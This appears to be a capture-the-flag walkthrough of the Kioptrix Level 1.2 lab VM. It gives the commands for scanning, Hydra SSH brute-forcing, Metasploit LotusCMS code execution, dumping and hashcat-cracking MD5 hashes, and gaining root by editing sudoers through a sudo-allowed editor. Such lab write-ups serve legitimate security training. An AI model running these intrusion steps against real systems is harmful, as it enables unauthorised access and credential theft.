Kioptrix Level 1.2 3

Vulnhub virtual machine; On the path to OSCP this box offered web-application testing with Metasploit, myphpadmin credentials enumeration. Cracking hashes with Hashcat an interesting Priv-Esc which included modifying the sudoer file.

Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an β€œethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.

By continued reading, you acknowledge the aforementioned user risk/responsibilities.


netdiscover -r


Nmap Scanning

nmap -sV -sC -oA nmap/kio3

Navigating to http-server on port 80

searchsploit for web application

searchsploit lingoat

nothing of note turned up.

Checking out the source of web-application

looks to be based off php with the index.php?pagee=index.

We have a username loneferret who was mentioned on a blog section post. Move to try to bruteforce the ssh with user name.

Hydra Bruteforcing SSH

hydra -e nsr -l loneferret -P /usr/share/wordlists/rockyou.txt ssh -t 4

Important: to use *-t 4* to not overload the ssh server and risk some passwords not being tested.

brute forcing inside a VM is… well terrible.

Login page

searchsploit LotusCMS

searchsploit LotusCMS

interesting find

Viewing how the Metasploit vulnerability works

There is a manipulation of the page parameter from the default page that will be worth investigating.

Remote Code Execution

Run metasploit - search lotuscms

msfdb run

this will load up the postgres and required files to launch.

We have achieved an easy shell.

getuid gets users sysinfo gets system information

capture /etc/passwd

cat /etc/passwd

usernames loneferret exists as conformation.

Search for any type of config files

search -d /home/www/ -f *config*

Investigating config files

cat /home/www/

myphpadmin user/password discovered!

Login to myphpadmin navigate to

access granted

Navigating through MySQL sever to the Gallery database and discovered dev_accounts

Hashes captured

dreg: 0d3eccfb887aabd50f243b3f155c0f85
loneferret: 5badcaf789d3d1d09794d8f021f40f0e

Determining type of hash


MD5 looks like a possible match.

Cracking Hashes with Hashcat add hashes to hash.txt

Launch Hashcat

hashcat -m 0 -a 0 hash.txt rockyou.txt -o cracked.txt

Hashes successfully cracked.

dreg       - 0d3eccfb887aabd50f243b3f155c0f85: starwars
loneferret - 5badcaf789d3d1d09794d8f021f40f0e: Mast3r

Connect to SSH

perform a quick sudo -l to determine what we can su-DO. (joke complementary)


execute sudo ht

sudo ht

playing around till discovered *ALT+f* is the command to move around in application

Modifying the sudoers file

adding /bin/sh/ to loneferret && save file


sudo /bin/sh

Bring me the root!